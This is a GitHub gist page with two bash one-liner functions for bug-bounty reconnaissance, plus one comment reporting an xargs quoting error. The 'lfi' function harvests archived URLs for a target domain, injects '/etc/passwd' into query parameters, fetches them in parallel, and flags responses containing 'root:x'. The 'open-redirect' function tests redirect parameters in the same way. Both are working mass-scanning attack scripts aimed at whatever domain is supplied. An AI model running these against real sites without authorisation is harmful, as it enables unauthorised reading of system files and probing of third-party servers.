Skip to content

Instantly share code, notes, and snippets.

@dwisiswant0

dwisiswant0/bash_aliases.sh

Last active March 12, 2024 17:17
Show Gist options
  • Star 16 You must be signed in to star a gist
  • Fork 7 You must be signed in to fork a gist
  • Save dwisiswant0/82e5320152fbc35f95aefa23d6d9331b to your computer and use it in GitHub Desktop.
Save dwisiswant0/82e5320152fbc35f95aefa23d6d9331b to your computer and use it in GitHub Desktop.
Download ZIP
One-liner to get Open-redirect & LFI
Raw
bash_aliases.sh
lfi() {
gau $1 | gf lfi | qsreplace "/etc/passwd" | xargs -I % -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
}
open-redirect() {
local LHOST="http://localhost"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
}
@Sicks3c
Copy link

Sicks3c commented Sep 27, 2020

Thank's for oneliner

I get this error when running any of them
xargs: unmatched single quote; by default quotes are special to xargs unless you use the -0 option

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment